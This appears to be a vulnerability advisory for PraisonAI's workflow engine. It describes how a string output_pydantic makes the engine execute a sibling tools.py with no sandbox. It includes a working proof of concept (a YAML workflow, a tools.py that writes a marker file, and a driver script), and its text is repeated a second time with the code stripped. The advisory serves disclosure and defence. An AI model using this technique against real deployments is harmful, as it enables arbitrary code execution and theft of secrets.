Summary
An unsafe dynamic module loading vulnerability allows an attacker who can control a workflow file and a sibling tools.py to execute arbitrary Python code when the workflow is executed.
Details
The vulnerability is located in the workflow structured output resolution logic.
File: src/praisonai-agents/praisonaiagents/workflows/workflows.py
Method: AgentFlow._resolve_pydantic_class
if self.file_path:
workflow_dir = Path(self.file_path).parent
tools_path = workflow_dir / "tools.py"
if tools_path.exists():
spec = importlib.util.spec_from_file_location("tools", tools_path)
tools_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(tools_module) # Arbitrary code execution
This code is reached during step execution when a step uses a string output_pydantic:
step_output_pydantic = getattr(step, '_output_pydantic', None)
if step_output_pydantic and isinstance(step_output_pydantic, str):
resolved_class = self._resolve_pydantic_class(step_output_pydantic)
file_path is set automatically by:
WorkflowManager._load_workflow() (used by workspace discovery)
WorkflowManager.create_workflow()
It can also be set manually after load_yaml():
wf = mgr.load_yaml("workflow.yaml")
wf.file_path = "workflow.yaml"
The exec_module() call has no sandboxing and ignores the PRAISONAI_ALLOW_*_TOOLS environment variables used elsewhere in the project.
PoC
Create the following two files in the same directory:
/tmp/attack/attack.yaml
name: AttackWorkflow
steps:
- name: generate
action: "Produce structured output"
output_pydantic: MaliciousModel
/tmp/attack/tools.py
print("[RCE] Arbitrary code executed from tools.py")
import os
with open("/tmp/rce_success.txt", "w") as f:
f.write(f"RCE executed by PID {os.getpid()}")
class MaliciousModel:
@classmethod
def model_json_schema(cls):
return {"type": "object"}
Run the following Python code (adjust the path to your PraisonAI source):
import sys
sys.path.insert(0, "/home/user/praisonai/src/praisonai-agents")
from praisonaiagents.workflows import WorkflowManager
from praisonaiagents.agent.agent import Agent
mgr = WorkflowManager()
wf = mgr.load_yaml("/tmp/attack/attack.yaml")
wf.file_path = "/tmp/attack/attack.yaml"
for step in wf.steps:
step.output_pydantic = "MaliciousModel"
step._output_pydantic = "MaliciousModel"
if not getattr(step, "agent", None):
step.agent = Agent(
name="researcher",
role="Researcher",
goal="Generate output",
instructions="Return structured data"
)
wf.start("trigger")
Impact
Type: Execution of Untrusted Local Code via Unsafe Dynamic Module Loading.
Affected users include:
- Users of
WorkflowManager(workspace_path=...), where workflow discovery automatically sets file_path.
- Users of
WorkflowManager.create_workflow().
- Applications that load workflows from repositories, templates, shared workflow collections, CI/CD artifacts, or other directories that may contain untrusted files.
During workflow execution, a string output_pydantic reference causes the framework to automatically locate, import, and execute a sibling tools.py file.
As a result, code contained in tools.py executes with the privileges of the workflow runner without requiring an explicit import or user approval step.
Successful exploitation results in arbitrary Python code execution within the workflow process. An attacker may be able to read local files, access secrets available to the process, modify workflow behavior, perform network operations, or execute additional system commands.
This behavior also bypasses the PRAISONAI_ALLOW_TEMPLATE_TOOLS / PRAISONAI_ALLOW_LOCAL_TOOLS protections used elsewhere in the project, allowing code execution through a separate workflow-resolution path.
Summary
An unsafe dynamic module loading vulnerability allows an attacker who can control a workflow file and a sibling
tools.pyto execute arbitrary Python code when the workflow is executed.Details
The vulnerability is located in the workflow structured output resolution logic.
File: src/praisonai-agents/praisonaiagents/workflows/workflows.py
Method: AgentFlow._resolve_pydantic_class
This code is reached during step execution when a step uses a string
output_pydantic:file_pathis set automatically by:WorkflowManager._load_workflow()(used by workspace discovery)WorkflowManager.create_workflow()It can also be set manually after
load_yaml():The
exec_module()call has no sandboxing and ignores thePRAISONAI_ALLOW_*_TOOLSenvironment variables used elsewhere in the project.PoC
Create the following two files in the same directory:
/tmp/attack/attack.yaml/tmp/attack/tools.pyRun the following Python code (adjust the path to your PraisonAI source):
Impact
Type: Execution of Untrusted Local Code via Unsafe Dynamic Module Loading.
Affected users include:
WorkflowManager(workspace_path=...), where workflow discovery automatically setsfile_path.WorkflowManager.create_workflow().During workflow execution, a string
output_pydanticreference causes the framework to automatically locate, import, and execute a siblingtools.pyfile.As a result, code contained in
tools.pyexecutes with the privileges of the workflow runner without requiring an explicit import or user approval step.Successful exploitation results in arbitrary Python code execution within the workflow process. An attacker may be able to read local files, access secrets available to the process, modify workflow behavior, perform network operations, or execute additional system commands.
This behavior also bypasses the
PRAISONAI_ALLOW_TEMPLATE_TOOLS/PRAISONAI_ALLOW_LOCAL_TOOLSprotections used elsewhere in the project, allowing code execution through a separate workflow-resolution path.